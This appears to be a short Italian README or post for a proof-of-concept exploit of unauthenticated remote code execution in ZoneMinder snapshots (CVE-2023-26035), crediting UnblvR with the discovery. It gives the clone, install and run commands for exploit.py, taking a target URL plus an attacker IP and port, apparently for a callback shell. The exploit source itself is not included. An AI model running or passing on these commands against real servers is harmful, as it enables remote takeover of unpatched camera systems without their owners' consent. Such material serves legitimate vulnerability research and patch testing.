
RCE non autenticata in ZoneMinder Snapshots - Exploit PoC
RCE non autenticata negli snapshot di ZoneMinder - Exploit PoC
alt img
Le versioni di ZoneMinder precedenti alla 1.36.33 e 1.37.33 sono vulnerabili a Remote Code Execution non autenticata a causa di controlli di autorizzazione mancanti nell'azione degli snapshot.
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
UnblvR ha scoperto la vulnerabilità.